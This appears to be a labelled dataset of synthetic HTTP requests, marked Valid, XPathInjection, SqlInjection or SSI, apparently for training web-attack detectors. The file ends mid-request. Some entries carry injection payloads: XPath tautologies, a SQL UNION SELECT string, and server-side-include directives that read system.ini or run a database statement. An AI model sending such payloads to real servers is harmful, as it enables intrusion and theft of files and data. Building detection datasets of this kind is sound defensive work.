If-Range: "fjbkck5@@XUJmh-IGPIP"
Max-Forwards: 3
MIME-Version: 2.2
Pragma: rdlexlrn='5e'
Proxy-Authorization: aei68w feBu6h=iV8ysrhR
Authorization: nvdaOi 71DuReno=rtai7aI
Range: 1-622060
Referer: http://www.rues.com/rY2nrdel/staeouq/ErebClos/2iItntml.exe
TE: trailers,deflate,gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/5.4 (X11; U; SunOS sun4u 8.8; xt-hS; rv:5.3.9) Gecko/13161127
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5730x198
Via: 7.3 www.qoclfTa.js:7, iyoai/8.5 www.olnwsgld.htm, FTP/9.2 4.187.150.163:87681
Transfer-Encoding: gzip
Upgrade: ert/8.4, 9sElr/0.9, gazCTs/2.0, iae/6.5
Warning: 717 www.k7Ci.png "wjutTmemede3s8" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 15541
Start - Id: 49818
class: XPathInjection
GET /nhihL/iSWQLY0e/2bNer4hnreeintt0eaa/OPx-qxfRboot.iniX/hN20cfkyQuIyrG@ql/lMtPa/E9ittaah.png?6cdterrcoi5=bAsFULhFI&rhwuxgtJcLo=ocmf%27+or+6+%3C++++count%28path%2Fchild%3A%3A*%29++or+%27eHPteoo%27++++%3D++++%27&whlkrbei2o=5694&eostPMm=nitae55owt+u%24p&rll3ukpiRseiet=98 HTTP/1.1
Host: www.qcttlfs.uk
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: 8l-unt
Cache-Control: only-if-cached
Client-ip: 146.50.160.76
Cookie: EOtrn7eO8fh=alirtgdcrUiSdOtzt;qVXw=583;a8QCu806eval=acj;cbssl45vnyUw=eOXgerv3__;hrticq1=7383581;nmaecsrCnihas6n=t26i8nf8v8tecmde)~6
Cookie2: $Version="9"
Date: Sun, 29 Aug 04 23:53:03 GMT
ETag: "gC0@.8IijW.B2UanuLnC"
Expect: ee0n=eems
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 06 Jul 08 07:21:42 UTC
If-Unmodified-Since: Wed, 15 Jul 09 21:39:37 GMT
If-Match: "61Me-zYyR-KuTQyv_"
If-None-Match: *
If-Range: Wed, 04 Oct 06 13:12:19 UTC
Max-Forwards: 412
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: tieT iapre=tartt
Range: -786962,-08955,08-
Referer: /sov4su/chs8/iiaa/Ttcn.conf
TE: trailers
Trailer: Pragma
User-Agent: aeda5o
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: FTP/7.1 32.26.226.202:7
Transfer-Encoding: compress
Upgrade: iaungA/1.1, Ibh/8.2, greil/3.0, n3e/0.8
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 144.56.170.95
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49818
Start - Id: 18061
class: Valid
GET /ciTitrrirVdaAre/Nas2Daoeso/aid/yDqfLYMt.RIB/dfG/Ttmshy8k/mocha8betweencBDvxz_o/n28IwK1Mz5V/hXymGgizMqbKcX/Qph3iththaoir/ik1ihO.nsf? HTTP/1.1
Host: www.9egesttRI.biz
Connection: keep-alive
Accept: application/*, image/*, application/*
Accept-Charset: euc-cn;q=0.5, hz-gb-2312, iso-10646-ucs-2;q=0.8, cp-950;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 6.255.150.52
Cookie: reepsoeeznAr=miumaTentqinAt0;el4e9=54;RkwjE=93461185;y-5tMF=nntaOm
Cookie2: $Version="70"
Date: Sat, 02 Feb 08 15:17:10 CET
ETag: "SiTkbb.5aR7i804En"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Thu, 22 Jun 06 04:12:58 GMT
If-Match: "Neyg2-t0-.kHSuV21"
If-None-Match: "HSlgL3PtStfPBnt"
If-Range: "J4JheqD3in-Znai8oAE"
Max-Forwards: 5608
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: nagit ilrhne=uTamR
Authorization: NTLM aGVpcm9ucnRuNmlhZzNucnlkdG5mczlvdDR0d3J0ZWhxMHRldGdwdEVGb3Q=
Range: -498682,294755-,-12868
Referer: /aoeEoe/ioitenro/ih2a/rMUsM/lodelh.cfm
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/0.7 (compatible; J6c4erehie; Win 9x; GObhen)
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: 0.1 66.161.71.41, ikne/6.1 www.oNnT.png:3198
Transfer-Encoding: hpt5i
Upgrade: tdlvc/2.4, nwdaao/9.3
Warning: 781 78.175.59.108 "s0atoompRe" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 507009022926065
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18061
Start - Id: 42280
class: SqlInjection
GET /i.@Lt-rQ-BX9duEasK/tSrx/ie.html?wlaQni9Jo-=%27+%29+++++UNION++ALL++++SELECT++irtAoeof+++FROM++++Iwee2f1en+++++WHERE+++%28+++%27%27%3D+++%27&5nn=lnaaehaereive&s6bncf=Len&oengith2y=e+e8ro&utstjb05ettloxw=aysIola HTTP/1.1
Host: 136.172.146.189
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, gzip;q=0.0
Accept-Language: ov1ceg-oohs;q=0.0, i2lh8i-E, 3rItd-Ietevla, w-tixhvm
Cache-Control: min-fresh=66510
Client-ip: 208.207.204.31
Cookie: ivofOLdlc=r>hiezppi:netcatohrh;in2ZhfB1=reCziuouhulOeun:;d2ejit7nbllsit=819024;ptdtamnsndrtew=32e;eboiikti=oht;exAuNtnt=812087510
Cookie2: $Version="649"
Date: Sun, 23 Dec 07 13:16:39 CET
ETag: "Poh1.C66XqM675xtZ"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Mon, 20 Mar 06 09:22:27 CET
If-Unmodified-Since: Sun, 12 Aug 07 07:55:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5857
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: NTLM YkN0dGFpb3ViSHFlaG9odmhsam5wcm83d2VoaXRubDN0c3FvZjVxcg==
Range: -97,064827-802
Referer: /irte81te/3ao9ltvo/ynIe/7gTwnega/Upreorv.swf
TE: trailers,trailers
Trailer: Date
User-Agent: lreiy (t2MixVSz; w0tTCBAP; aJ4fATsB)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9352x3948
Via: FTP/3.9 www.ltsif7et.css, 5.4 www.g5osm.jpg
Transfer-Encoding: gzip
Upgrade: egf/1.1, bses/7.3
Warning: 903 www.csrnc.htm "rrsgh4khsra2oarcq2na" 
X-Forwarded-For: 221.156.21.94
X-Serial-Number: 280200406213
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42280
Start - Id: 20119
class: Valid
GET /ezC2/p4WvW_Jx3wOW/t3XA/oNBZ@sGNwX6e5BlN/dhK/window.openqt/ts.q2GPuJ./emzpJnwdJrv4ATe/formR/nsc7OBIXe8uOY0O56.swf?eliso8dde1=rAetao%5CE%27&3rMIBRq=window.open HTTP/1.1
Host: www.reFsn7r.cz:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.9, deflate;q=0.1, identity;q=0.5, identity;q=0.6
Accept-Language: rlnutz-eniose
Cache-Control: min-fresh=93657
Client-ip: 246.3.229.109
Cookie: ff=edsedeoE+lE;eo3ntdnuqdb=b<@ne Y;uSelt=bJ0LmIODHV;dmtic=3VjFZ
Cookie2: $Version="81"
Date: Fri, 05 May 06 14:47:25 CET
ETag: "zn.IiEeDfV_qRyqiN"
Expect: 100-continue
From: t261O@oawcrm.be
If-Modified-Since: Mon, 27 Sep 04 05:55:26 UTC
If-Unmodified-Since: Mon, 14 Aug 06 12:08:27 UTC
If-Match: "iPwl0Zw7uw7w--5"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.3
Pragma: coti='weesh'
Proxy-Authorization: 8dgRi tith2yiI=td0ke
Authorization: aoMoA rbnU=YhsEEmt
Range: 41-,-67213
Referer: /e7hayHo/xft6Y2tA/o2stoies.swf
TE: trailers
Trailer: Host
User-Agent: ssmbz (aCR6PGOM; swK5tXet)
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7885x126
Via: s0n/3.9 www.idtzoj2.html:88, FTP/0.2 86.198.29.52, 2.8 161.242.182.213
Transfer-Encoding: eiqrse
Upgrade: bne/0.1, LZsinl/3.7
Warning: 660 www.e06sbm.png:915 "itsTnmtqleDAXa" "Fri, 23 Dec 05 19:02:37 GMT"
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20119
Start - Id: 49790
class: XPathInjection
GET /te/tEsD/elnvWs8EL3zaJ/balrsn.jpg?thtdd=ulnsdamWt&eiARnefmrhtCot=a5%24m&la=ouo&tahoIleeelre=%3FEofl0-%26a&ejEore=hthelaldxase&dye9=nltRI%29nteoly%29+8Qnn1&ecEstsdf=575093&wtso=d6QbsjNQ&se=24Ath&98hkIZ=8&br0r=aoe1osl%27+++or++6++++%3C++count%28path%2Fchild%3A%3A*%29++++or+++++%27eyee%27++%3D++++%27&abipxloagsx=bA2Yp&nrsixtt=524930 HTTP/1.0
Host: 46.214.197.14
Connection: close
Accept: audio/x-wav;q=0.2, image/png
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 140.31.18.95
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="615"
Date: Fri, 28 Oct 05 10:31:12 UTC
ETag: W/"8Nw-K59c314vRFuXk"
Expect: o7eBsmo9
From: terol@hDey.ch
If-Modified-Since: Wed, 13 Jun 07 22:12:45 GMT
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: "ctTSS3IJJhtLvGq"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 5.9
Pragma: ufrys=6s
Proxy-Authorization: Digest nonce
Authorization: Basic a090bmhhdzpodHR1
Range: 1-,586-,-3399
Referer: http://www.toio.net/tpciiy/Aei9o8n/i4dnetAa/uaw6/7sdI.jsp
TE: deflate;q=0.8
Trailer: Connection
User-Agent: zhOPr/8.4.7
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 742x2872
Via: 8.3 232.104.30.181:8, 1.3 84.107.70.98, 5.5 www.toone.htm
Transfer-Encoding: tydgD
Upgrade: afn/1.9, wee/7.0
Warning: 792 www.nWnon.js "8t72nuuaga4Mefialtf" "Sat, 08 Jan 05 22:28:36 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49790
Start - Id: 4978
class: Valid
PUT /8QshmrWie/ucEnLPs4/rcp5PqRQ/eJk84U/g_KXlocationUbxYGK/eta3pl1aRmohtgurh/i6hI2tuE/DcISsfi/EJAvp.Oq/iuUoh5NXYf8RjozyVOA/r7xuDtwi3BAbfoe.htm? HTTP/1.0
Content-Length: 175
Content-Language: I9xcl7dq,t1rd7y
Content-Encoding: deflate
Content-Location: http://www.pinIsd.gov/bidir/ie6enrcn.asp
Content-MD5: ZmFvaG1pYWVlM1BJc0J1aw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Mar 07 20:07:20 CET
Last-Modified: Sun, 27 Sep 09 02:09:50 CET
Host: www.nwSletoue.biz
Connection: ipeicrna
Accept: */*;q=0.4
Accept-Charset: iso-8859-2;q=0.5, big5, gb2312;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 105.202.185.52
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="1"
Date: Mon, 04 Dec 06 21:25:23 UTC
ETag: "E6Q_HzRmW4MH.Tv2NR-"
Expect: jtdRSzw=syia
From: zqhtasa7@rsaljt.it
If-Modified-Since: Tue, 29 Sep 09 01:00:18 GMT
If-Unmodified-Since: Sat, 26 Sep 09 01:14:25 CET
If-Match: "C8RgJ@YVOJEii2YbB"
If-None-Match: "fG-LSAqeWA5fXzEW7_.n"
If-Range: Fri, 08 Oct 04 22:29:55 CET
Max-Forwards: 3968
MIME-Version: 8.6
Pragma: nuiea='rstn'
Proxy-Authorization: NTLM eWxvbHNtZTZJYklvZXRuN3lyNkhyemF3ZXN3RWVkdGJqM3NrZzNl
Authorization: NTLM cnJlb2Vrbm5iZXRuZWxvbGM3dG1ybWNuaWJmNXRhZTRubWdlb2V0ZGQ=
Range: -6861,11-204609
Referer: /tuRrhnL/3qh1dsL/puho/seea/hHoi.cfm
TE: trailers
Trailer: From
User-Agent: yCsfk_Pg84 http://www.3cprt.gov
UA-CPU: Sparc
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: HTTP/9.7 112.7.88.192
Transfer-Encoding: identity
Upgrade: coejsr/9.9
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 99.65.168.34
X-Serial-Number: 3100317318115604683
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

oahmnt=hhODNn@LmoZ&1ozlmiswem=toeti&MZyI=tdaXrwoahng0sie&manoetYaRe=seon+eii h&oicsH7ham=vm%an&giqumn78=ib n ir&Tp8oyR9=22614876&eheoWbs5oomubse=7917&mas9dsttRtSAi=02130

End - Id: 4978
Start - Id: 40956
class: SSI
POST /bRT4VGd/t0-c9zYqXwTdOF3mzT7_/FYfrom2xPX5DlnU/lItdulys4hAnmdn/aJ.CI5J-xxwNPqrthqU/ahtuoDaeouoadtl/cBiKdAK9e_HB@/U6doGGYVYN5/I.y.dll? HTTP/1.0
Content-Length: 243
Content-Language: drdrsux,8as
Content-Encoding: identity
Content-Location: http://iabgq.fr/neie0/e9rm3n/grwcre/Ndla/oroaiEa.msf
Content-MD5: c2V0YWVpZnZyZnQ0WHdzcA==
Content-Type: application/x-www-form-urlencoded
Host: www.oi3hk7uxs.uk
Connection: mhea
Accept: */*
Accept-Charset: *
Accept-Encoding: <!--  #odbc  statement   = "select  satraoa, picat5hd, 3irc     from  sohhbb   order     by    9,   640,    0"  -->
Accept-Language: Cbc-E6;q=0.2
Cache-Control: no-cache
Client-ip: 164.128.152.74
Cookie: cbrpSmakgies=eah rno6iwaocet
Cookie2: $Version="799"
Date: Mon, 31 Mar 08 23:52:48 UTC
If-Unmodified-Since: Fri, 09 Oct 09 15:17:58 UTC
If-Match: "Kj7gA0Z_uyAF2BprI"
If-None-Match: "KFI.gxWFvJYs-x59u"
If-Range: Fri, 29 Aug 08 21:18:59 CET
Max-Forwards: 7
MIME-Version: 0.9
Pragma: mUtuJic='t'
Proxy-Authorization: Basic aW5pZDpzdGtuYw==
Authorization: oa0or mmrsne=lnoiioke
Referer: http://fzwqsI.net/uluetd4.asp
TE: chunked;q=0.3
User-Agent: zosaeSoj (hWShO1em; aeurB9hp; dSpPBnHc)
UA-Color: color32
Transfer-Encoding: compress
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ia6oe=8786594&ew=ditaS&sRrtsyUnqhumybo=to6d1rz&33N4nx=f&anxnseabqiaM=au>pn&odkillNshtd=e8tss&s2=833660992&adddedsateq=47557&rntzn=3465958&AmvA5_=fu%=v&rmsieeIR=804&wPtteiaeoeajh=eeave&sessse=900922&drerctebrj4=7&wNiwCoteoettRs=mdbdz7ruea

End - Id: 40956
Start - Id: 5675
class: Valid
POST /sypuoh8uut/2j6dNtm8MzrTkchild/kZ/1ad6trspddsotn/itolUta3hsl.htm? HTTP/1.1
Content-Length: 333
Content-Language: u
Content-Encoding: gzip
Content-Location: http://www.cegEwreg.cz/dukag/sttbrcl.pl
Content-MD5: ZWN5Y3dtdEVzcnFzdW9lcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 May 04 17:53:43 GMT
Last-Modified: Sun, 18 Feb 07 09:03:25 GMT
Host: www.gsp3s.it
Connection: close
Accept: image/jpeg;q=0.0, application/x-tar;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: cfoEzlti-qputrAri;q=0.0, ktoensei-d4gveTt1;q=0.0, tmxia-ac;q=0.8, jtm-a
Cache-Control: no-store
Client-ip: 235.193.225.211
Cookie: aea=8273;drp=qo
Cookie2: $Version="60"
Date: Sun, 08 Aug 04 18:55:35 UTC
ETag: "W-Woimzu-1OZAg8"
Expect: pige=eph8;ttll6v
From: 6onsas@rsaEn.cz
If-Modified-Since: Tue, 01 Jun 04 12:16:06 CET
If-Unmodified-Since: Fri, 06 Nov 09 23:39:16 UTC
If-Match: "aUZ1qzfIMy@o7mswACzU"
If-None-Match: "fAByzGriNoRLH1RtrEc8"
If-Range: "odsbUS4Ou-W446GY"
Max-Forwards: 803
MIME-Version: 4.0
Pragma: nEnceep=9sbdmee0
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Digest response="97BFaA43715eD41DAdeb6cd6C9b45cfA"
Range: -816900,24457-
Referer: http://www.dntrks.gov/dto9/hh6jrTb/eptr/ms3dxc.rar
TE: chunked;q=0.9,trailers
Trailer: Accept-Encoding
User-Agent: dyeetecqeir85LoTpere
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: tte/1.3 18.61.91.177:606
Transfer-Encoding: ENAesd; Nsdd=Aneslz
Upgrade: bccaR/0.3, ssaas/5.7, est/1.9, eToih/4.1, Gut/5.5
Warning: 162 253.233.234.60 "iILnb" "Mon, 07 Nov 05 13:32:13 UTC"
X-Forwarded-For: 33.1.105.183
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~

hitkraorere=teolRhhnif&Zeval_QliblY=n~access_logg eiae6eshutdown%uh(l&tB08Nswslut=4137588127&xctihebx=9716136&qisicsK=optkRiservicessRhhl;8uae&yiyqr=ns&EGK5p0g-Fu=eEquvetgynmuSr5sa&childaM38KVt8m4=eD29ZK1Uz&oup=25&t2Dtwtani5eao=650279&jmwikilpa=ojr&eti5ODujs3ao6rt=oacrnc5zgroup byghoyp&ncb=eihos4AN0eg6g&mclaasca=%dYr- smj

End - Id: 5675
Start - Id: 16720
class: Valid
GET /wh23Qa8WfSTAWm/h9XhDk5k_8qym_X@U-/nsuuerf/qnnwt/nro3iwrr5nse/ljgJ/daiboa9/xsgMietapftlrea/5c3thetchawawattyish/annlts3taeCt/lrhy/hoS.htm?erEe0=etclenlmIok%3D&ny8trchese4Nnyn=012704&X4fd=9335156&ske0btuyceQ=wgetvRoO&MorFMD=7&ieifningr=%7CsqSseex&ijal=ortaxCacPtn HTTP/1.0
Host: www.eeii.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, big5;q=0.1, x-mac-japanese;q=0.9
Accept-Encoding: 
Accept-Language: tsa18pc-h38;q=0.6, OH-t, A-8msnefE
Cache-Control: max-age=07520
Client-ip: 141.210.75.87
Cookie: goxYSt4=h;aen8nkM=UiOi;cdasrudejrocrCm=27855;to=s;QoptXT=gkUUm8;abrge=73909
Cookie2: $Version="880"
Date: Mon, 27 Oct 08 17:40:12 CET
ETag: "cmZAk1UstqOVNUvSS-AP"
Expect: 7tcslhbw=wuirr;dhkawis=ocacpi
From: o6botttt@Meerth.org
If-Modified-Since: Sat, 22 Apr 06 03:31:54 UTC
If-Unmodified-Since: Sun, 05 Apr 09 05:51:40 UTC
If-Match: "w7Xzlo8Bg.4zSDyk"
If-None-Match: *
If-Range: "Spn0SnVTZnxxdfVMG"
Max-Forwards: 670
MIME-Version: 4.6
Pragma: a=dsrmgw
Proxy-Authorization: NTLM Y29kbXc0dXlob3VlZmVzcmQwZWFzdWhsaFJubm5oM2I1VGU=
Authorization: Digest nc=82E0feed
Range: 735-128151,-280736
Referer: /RLrnhsz/gcas/lno0rwrs.mpeg
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: EhcsmSu0dnnnati
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2648x5027
Via: 1.7 33.167.176.136
Transfer-Encoding: deflate
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 161 245.212.126.32 "ihhi" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 6672124414
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16720
Start - Id: 13275
class: Valid
GET /dKFJRW9vKHFj-bbV@N/ufd/raiha/ttD/k.sZDs8Bk/eejmuoigRLtf/iUPpq5tV2sIePC/uX5NWWTk4@d/nlxtNToa2hW/o4mitetaudeftgeg/rEInhueaoco2uerer.jpeg?p1a=36&Enno0hYwthnHe=loosf57y4iapJonsEh HTTP/1.0
Host: www.ence.org
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: isiri-3342, x-mac-cyrillic, x-mac-chinesetrad;q=0.5, x-mac-arabic;q=0.9, iso-8859-2;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 226.208.80.28
Cookie: Lm7ecg=emon@;hlehEe6er=Do$:
Cookie2: $Version="752"
Date: Wed, 28 Jun 06 21:23:16 GMT
ETag: "VxVp5XA13z8f4JWT"
Expect: 100-continue
From: Tpee@itzhRk.it
If-Modified-Since: Wed, 10 Dec 08 18:37:03 UTC
If-Unmodified-Since: Sat, 10 Nov 07 13:22:46 UTC
If-Match: "peMPWI3.a1TcyRM"
If-None-Match: "2P8jKbEXbpzhN8x3Q6"
If-Range: *
Max-Forwards: 791
MIME-Version: 0.5
Pragma: rHsgtnig=ns
Proxy-Authorization: NTLM ZGVlMGFlZUU1NGl0dm5lYTJ3YW5zZW9BRXN0YWV3ZXN1N2Jscg==
Authorization: NTLM c2FUMW9vdkVxdG1lRWVheGVsbGhoaWRkaWNkYW9OZW90a2VyNGhpZmUxMGhhbTU=
Range: 6-,405-,74-23633
Referer: /8vvDv.php3
TE: trailers,deflate;q=0.9,gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.8 (Windows; U; Windows NT 9.4; ke-ae; rv:6.3.6) Gecko/62708541
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2344x540
Via: HTTP/3.7 98.105.155.65:73, 0.5 www.ocecoi.gif
Transfer-Encoding: compress
Upgrade: wR3/7.6, otia/4.2, tdnt3/1.1, nttir/7.7, l7tde/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13275
Start - Id: 31754
class: Valid
GET /lrirsZarlnh9keiirsw/qGUUrM-HTbPAL/acqEtonnh/P.Tx/iIwFnA/cst1nl/ooyw1lPf-ql/jV-jkR31qxnzOn@0h/ceTwimnqkeyeisoc1noo.htm? HTTP/1.0
Host: 100.8.202.126:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: 6pzeektn-m;q=0.1, ebsi5efe-m, 3pQmli-uiha, 8thp-N8geeY;q=0.3, oier-i
Cache-Control: min-fresh=6049
Client-ip: 82.229.243.228
Cookie: iitnenasylEd=983;aeesgorodelu=f%osdeodthur[vZ
Cookie2: $Version="2"
Date: Fri, 21 May 04 05:41:33 UTC
ETag: W/"N3pXuj9hycE3itDq"
Expect: 100-continue
From: Bll8es@eijtedl.gov
If-Modified-Since: Wed, 28 Jul 04 14:58:39 UTC
If-Unmodified-Since: Mon, 28 Jun 04 10:29:30 GMT
If-Match: *
If-None-Match: *
If-Range: "zVkhY123ECjk1nLn2QK"
Max-Forwards: 1
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM M2VzNm9jYm4yc3N0NmZYMW91bFNkRWhybHNyZkZzZW5sYWVsSHFhcnNsY3c=
Authorization: Basic bW5paDo1c3R1
Range: 707434-,-591
Referer: http://www.drerInd6.net/Tsio0p/odatac/inm3pba/osbt/NseAh.cgi
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.2 (X11; U; Solaris 8.4; ht-is; rv:8.1.8) Gecko/81057004
UA-CPU: Sparc
UA-Disp: 794,2521,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: NUdyts/3.1 174.26.7.196:2
Transfer-Encoding: identity
Upgrade: Nesagu/1.4
Warning: 198 227.83.143.66 "ntior4dtoetty" "Sun, 24 Sep 06 10:26:52 UTC"
X-Forwarded-For: 78.110.85.184
X-Serial-Number: 48619214669
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31754
Start - Id: 40384
class: SSI
GET /dt-pUO/e.rKmSJwFlRCKX6f/ac1EEP5DOIsAMb84e/U@HaUUDjBb@Fe/kTrG9.XPwg0Sf7b/l0WfoJu/tmpB/u4l/gaGCqp_gt.jpg?n4smtsTmscps=eUwvOt953a&jBzQ8Jnph-tBf=Ureplace&nNtcEnzsaterpnh=1498315232&hblnswFix=ircrtm%5C&teeapt=-tprocessing-instruction HTTP/1.1
Host: www.tsaegn.st
Connection: close
Accept: video/*;q=0.9, video/mpeg;q=0.3, video/*
Accept-Charset: koi8-r;q=0.0, cp-936;q=0.0, x-mac-cyrillic;q=0.0, hz-gb-2312;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 45.2.5.4
Cookie: CsWVv=rsamconnectct\io;agdeimd=<!--    #include virtual="c:\winnt\system.ini" -->
Date: Fri, 13 Oct 06 17:10:59 GMT
ETag: W/"yTD.-U9atuF3GYoxUQX2"
Expect: nibmalar
From: Cgpc@NeyqpjnU.ch
If-Modified-Since: Sat, 19 Nov 05 20:47:36 UTC
If-Unmodified-Since: Wed, 11 Feb 04 09:26:01 CET
If-Match: *
If-None-Match: "cM_nDseWu40iwCgq0"
If-Range: Mon, 01 Sep 08 13:16:46 GMT
Max-Forwards: 1012
Pragma: no-cache
Authorization: Digest realm
Referer: http://artuea.fr/sdKitisc/hawen.swf
TE: trailers,trailers,deflate
User-Agent: Mozilla/9.9 (Windows; U; WinNT 9.0; ee-Ha; rv:0.6.4) Gecko/72499895
Via: FTP/8.3 62.95.241.64, 8.1 www.woNebu.jpg
Upgrade: oot/9.6
X-Serial-Number: 67175065778881271
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40384
Start - Id: 10577
class: Valid
GET /yeenP9c/5ygePBk/hy/ooiiuttd/9nODj3w3h/hruLMd.v_LckU/rCVeW4WRs920Q/vHqE/aeAstaos/pts9lwdaao1aaune/ppLyG.gcrNw7dFo/ZTiQ.tiff?8Ttsasg6plo=p5z&e5tQHahbN=ds&v1WR=e%3Co6n2nden%3DtAl6sr&OHMjhdelete=eMb&ghbpS=jeantqd&en5g=tJVCINBO2%40E HTTP/1.1
Host: www.eeiaXiE.it
Connection: keep-alive
Accept: audio/x-wav, application/*;q=0.2, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: oeox5eyo-sreo, erKsq-naonee
Cache-Control: max-age=0517
Client-ip: 120.227.221.236
Cookie: sisvi9Uape5=rZX-dmnOV9;9cyae=oXwdmseitahosclZy;I6flike=ibAlnm4rLS;ga=i@etsock_stream
Cookie2: $Version="6"
Date: Sat, 18 Feb 06 19:22:13 UTC
ETag: "KdtBlfZ7ILH1O8N"
Expect: 100-continue
From: mohdrcal@8y7xh.de
If-Modified-Since: Sun, 02 May 10 13:23:00 UTC
If-Unmodified-Since: Thu, 08 Jul 04 18:55:53 GMT
If-Match: "-R_fTZC8Pv09_9SS-zvC"
If-None-Match: *
If-Range: Wed, 05 Nov 08 20:01:55 GMT
Max-Forwards: 2
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: hesnt hko5i=o2tcim
Authorization: Digest qop=auth-int
Range: 13113-277,3-670,8449-3
Referer: /nooeNeh/aoosF.tar.gz
TE: trailers,chunked,deflate
Trailer: TE
User-Agent: sezhsiiadm
UA-CPU: PowerPC
UA-Disp: 942,3967,8
